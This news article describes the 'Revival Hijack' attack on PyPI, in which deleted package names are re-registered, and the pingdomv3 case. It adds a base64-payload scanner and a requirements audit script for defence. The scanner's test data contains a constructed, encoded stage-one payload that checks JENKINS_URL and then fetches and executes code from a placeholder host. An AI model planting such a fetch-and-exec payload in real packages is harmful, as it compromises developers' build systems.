Hackers hijacked 22,000 removed PyPI packages, distributing malicious code to developers

Ravi Lakshmanan, September 4, 2024

A new supply chain attack technique targeting the Python Package Index (PyPI) registry has been used in the wild in an attempt to infiltrate downstream organizations.

Codenamed Revival Hijack by JFrog, a software supply chain security company, the attack method could be used to hijack 22,000 existing PyPI packages and lead to "hundreds of thousands" of malicious package downloads. Some of these packages have more than 100,000 downloads or have been active for more than six months.

"This attack method involves hijacking PyPI software packages by manipulating the option to re-register them after they have been removed from the PyPI index by the original owner," JFrog security researchers Andrey Polkovnichenko and Brian Moussalli said in a report shared with The Hacker News.

Essentially, the attack relies on the fact that once a package published to PyPI is removed by its owner, its name immediately becomes available for registration by any other user.


Statistics shared by JFrog show that an average of about 309 packages are removed each month. This can happen for a variety of reasons: lack of maintenance (the software is abandoned), re-publishing the package under a different name, or the same functionality being absorbed into official libraries or built-in APIs.

This creates a lucrative attack surface, one more effective than typosquatting: an attacker uses their own account to publish a malicious package under the freed name with a higher version number, infecting any development environment that upgrades it.

"The method does not depend on the victim making a mistake when installing the package," the researchers said, explaining why Revival Hijack performs better from an adversary's perspective. "Many users consider upgrading a 'once safe' package to the latest version to be a safe operation."

Although PyPI has protections against impersonation and typosquatting attempts, JFrog's analysis found that running the "pip list --outdated" command lists the fake package as a new version of the original, even though the former is a completely different package from a completely different author.

More worryingly, running "pip install --upgrade" replaces the genuine package with the fake one without any warning that the package author has changed, potentially exposing unwitting developers to significant software supply chain risk.

JFrog said it created a new PyPI user account called "security_holding", which it used to safely take over the vulnerable package names and replace them with empty placeholders, so that attackers cannot exploit the deleted packages.

Additionally, each of these placeholder packages has been given the version number 0.0.0.1 (the inverse of a dependency confusion attack scenario) so that it is never pulled in when developers run a pip upgrade command.

Revival Hijack has also already been exploited in the wild: an unknown threat actor using the name Jinnis published a benign version of a package called "pingdomv3" on March 30, 2024, the same day the original owner (cheneyyan) removed the package from PyPI.

On April 12, 2024, the new developer is said to have pushed an update containing a Base64-encoded payload that checks for the "JENKINS_URL" environment variable and, if it is present, executes an unknown next-stage module fetched from a remote server.


“This suggests that the attackers either delayed the attack or designed it to be more targeted, perhaps by limiting it to a specific IP range,” JFrog said.
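The payload pattern described above (a Base64 blob decoded at import time that checks an environment variable before reaching out to a server) is something a pre-install scan can catch statically. The following is an added example and not code from JFrog or from the article: it parses a Python module with `ast`, decodes any base64-looking string constants, and flags those whose decoded text reads an environment variable or calls exec/urlopen. The sample module, the `JENKINS_URL` check and the `example.invalid` URL inside it are constructed for the demo; the scanner only parses the sample and never executes it.

```python
import ast
import base64
import binascii
import re
from typing import List, Optional

# Indicators for the decoded text: the payload in the report reads an environment
# variable (JENKINS_URL) and then executes something fetched from a remote server.
ENV_CHECK = re.compile(r"os\.environ|getenv\(|JENKINS_URL")
EXEC_OR_NETWORK = re.compile(r"\b(?:exec|eval|compile)\s*\(|urlopen\(|b64decode\(|subprocess")
B64_ALPHABET = re.compile(r"[A-Za-z0-9+/=\s]+")


def decode_if_base64(s: str) -> Optional[str]:
    """Return the decoded text if s looks like a base64 blob of readable text, else None."""
    if len(s) < 24 or not B64_ALPHABET.fullmatch(s):
        return None
    try:
        raw = base64.b64decode(s)
    except (binascii.Error, ValueError):
        return None
    if not raw:
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if not all(c.isprintable() or c in "\r\n\t" for c in text):
        return None
    return text


def scan_source(source: str, filename: str = "<module>") -> List[dict]:
    """Parse (never execute) a module and report base64 string constants whose
    decoded content carries an environment check or an exec/network call."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not (isinstance(node, ast.Constant) and isinstance(node.value, str)):
            continue
        decoded = decode_if_base64(node.value)
        if decoded is None:
            continue
        env = ENV_CHECK.search(decoded) is not None
        exe = EXEC_OR_NETWORK.search(decoded) is not None
        if env or exe:
            findings.append({"file": filename, "line": node.lineno, "env_check": env,
                             "exec_or_network": exe, "preview": decoded.strip()[:60]})
    return findings


# Constructed stage-one text mirroring the behaviour described in the report:
# gate on JENKINS_URL, then fetch a second stage. The URL is a placeholder and
# this text is only ever parsed by the scanner, never executed.
STAGE_ONE = (
    "import os\n"
    "if os.environ.get('JENKINS_URL'):\n"
    "    import urllib.request\n"
    "    exec(urllib.request.urlopen('https://example.invalid/stage2').read())\n"
)
# Constructed module standing in for a revived package's __init__.py.
SAMPLE_MODULE = (
    "import base64\n"
    "VERSION = '3.0.1'\n"
    "def ping(host):\n"
    "    return 'pinging ' + host\n"
    "_b = " + repr(base64.b64encode(STAGE_ONE.encode()).decode()) + "\n"
    "exec(base64.b64decode(_b))\n"
)
# Constructed benign module: a long base64 constant that decodes to plain text.
BENIGN_MODULE = (
    "LOGO = 'SGVsbG8gd29ybGQsIHRoaXMgaXMgYSBiZW5pZ24gc3RyaW5nLg=='\n"
    "def ping(host):\n"
    "    return 'pinging ' + host\n"
)

if __name__ == "__main__":
    for finding in scan_source(SAMPLE_MODULE, "pingdomv3/__init__.py"):
        print(finding)
```

Run it over every `.py` file in a downloaded sdist or unpacked wheel before the package is installed; a hit on both `env_check` and `exec_or_network` in the same blob is the shape worth a manual look, while a base64 constant that decodes to plain text (logos, templates) produces nothing.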

The new attack is a sign that threat actors are considering supply chain attacks on a broader scale, targeting deleted PyPI packages to widen their reach into enterprises. Organizations and developers are encouraged to audit their DevOps pipelines to ensure they are not installing packages that have already been removed from the repository.
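One concrete form of the pipeline audit recommended above, as an added example (not JFrog's tooling and not code from the article): it parses a hash-pinned requirements file and compares each pin against the package's release metadata in the shape of PyPI's JSON API (`releases`, keyed by version, listing files with `digests.sha256` and `upload_time_iso_8601`). Three signals are checked: the pinned version no longer exists on the index, no file of that version matches the pinned hash, or every upload postdates the date the dependency was locked (a package whose entire history is newer than your lockfile has been removed and re-registered). The index data, wheel bytes, lock date and the pingdomv3 version numbers are constructed for the demo; the article gives only the March 30 and April 12, 2024 dates.

```python
import hashlib
import re
from datetime import datetime, timezone
from typing import Dict, List


def _normalize(name: str) -> str:
    """PEP 503 project-name normalization so 'Other_Lib' and 'other-lib' compare equal."""
    return re.sub(r"[-_.]+", "-", name).lower()


def parse_requirements(text: str) -> Dict[str, dict]:
    """Parse 'name==version --hash=sha256:<hex>' lines and reject anything not pinned.
    A requirement pip may resolve to a newer release is exactly what a revived package needs."""
    reqs: Dict[str, dict] = {}
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        tokens = line.split()
        pin = re.fullmatch(r"([A-Za-z0-9][A-Za-z0-9._-]*)==(\S+)", tokens[0])
        if not pin:
            raise ValueError(f"unpinned or malformed requirement: {line!r}")
        hashes = set()
        for tok in tokens[1:]:
            h = re.fullmatch(r"--hash=sha256:([0-9a-fA-F]{64})", tok)
            if not h:
                raise ValueError(f"unsupported option in requirement: {line!r}")
            hashes.add(h.group(1).lower())
        reqs[_normalize(pin.group(1))] = {"version": pin.group(2), "hashes": hashes}
    return reqs


def audit(reqs: Dict[str, dict], index: Dict[str, dict], locked_at: datetime) -> List[dict]:
    """Compare pins against index metadata and return one finding per problem."""
    findings: List[dict] = []
    for name, req in reqs.items():
        meta = index.get(name)
        if meta is None:
            findings.append({"package": name, "reason": "not-on-index"})
            continue
        releases = meta.get("releases", {})
        uploads = [datetime.fromisoformat(f["upload_time_iso_8601"].replace("Z", "+00:00"))
                   for files in releases.values() for f in files]
        # Whole history newer than the lockfile: the name was freed and re-registered.
        if uploads and min(uploads) > locked_at:
            findings.append({"package": name, "reason": "history-reset",
                             "earliest_upload": min(uploads).isoformat()})
        files = releases.get(req["version"])
        if not files:
            findings.append({"package": name, "reason": "pinned-version-missing",
                             "version": req["version"]})
            continue
        digests = {f["digests"]["sha256"].lower() for f in files}
        if not req["hashes"]:
            findings.append({"package": name, "reason": "no-hash-pin"})
        elif not (req["hashes"] & digests):
            findings.append({"package": name, "reason": "hash-mismatch", "version": req["version"]})
    return findings


def _sha(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def _file(data: bytes, when: str) -> dict:
    return {"digests": {"sha256": _sha(data)}, "upload_time_iso_8601": when}


# Constructed stand-ins for wheel contents; only their digests matter here.
GOOD_WHEEL = b"constructed good-lib 1.2.0 wheel"
OTHER_WHEEL_LOCKED = b"constructed other-lib 4.1.0 wheel as originally locked"
OTHER_WHEEL_NOW = b"constructed other-lib 4.1.0 wheel re-uploaded by another account"
PINGDOM_OLD = b"constructed pre-removal pingdomv3 2.0.0 wheel"

# Constructed index metadata in the shape of https://pypi.org/pypi/<name>/json.
SAMPLE_INDEX = {
    "good-lib": {"releases": {"1.2.0": [_file(GOOD_WHEEL, "2022-05-01T10:00:00.000000Z")]}},
    "other-lib": {"releases": {"4.1.0": [_file(OTHER_WHEEL_NOW, "2023-02-10T10:00:00.000000Z")]}},
    # pingdomv3 after the revival: pre-removal releases are gone and every file
    # postdates March 30, 2024. Version numbers are assumed; the report gives none.
    "pingdomv3": {"releases": {
        "3.0.0": [_file(b"constructed revived pingdomv3 3.0.0", "2024-03-30T12:00:00.000000Z")],
        "3.0.1": [_file(b"constructed revived pingdomv3 3.0.1", "2024-04-12T12:00:00.000000Z")],
    }},
}
SAMPLE_REQUIREMENTS = f"""
good-lib==1.2.0 --hash=sha256:{_sha(GOOD_WHEEL)}
Other_Lib==4.1.0 \\
    --hash=sha256:{_sha(OTHER_WHEEL_LOCKED)}
pingdomv3==2.0.0 --hash=sha256:{_sha(PINGDOM_OLD)}  # assumed pre-removal pin
"""
LOCKED_AT = datetime(2024, 1, 15, tzinfo=timezone.utc)  # assumed lockfile generation date


def run_sample() -> List[dict]:
    return audit(parse_requirements(SAMPLE_REQUIREMENTS), SAMPLE_INDEX, LOCKED_AT)


if __name__ == "__main__":
    for finding in run_sample():
        print(finding)
```

In a real pipeline the `index` argument is filled from `https://pypi.org/pypi/<name>/json` for each pinned name, and any finding fails the build; `history-reset` in particular is the fingerprint of a revived package, since a legitimate project keeps the releases you originally locked against.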

"Exploiting vulnerable behavior in the handling of removed packages allowed attackers to hijack existing packages, making it possible to install them on target systems without any changes to the user's workflow," said Moussalli, head of JFrog's security research team.

“The attack surface of PyPI packages is constantly growing. Despite the active intervention, users should always remain vigilant and take the necessary precautions to protect themselves and the PyPI community from this hacking technique.”
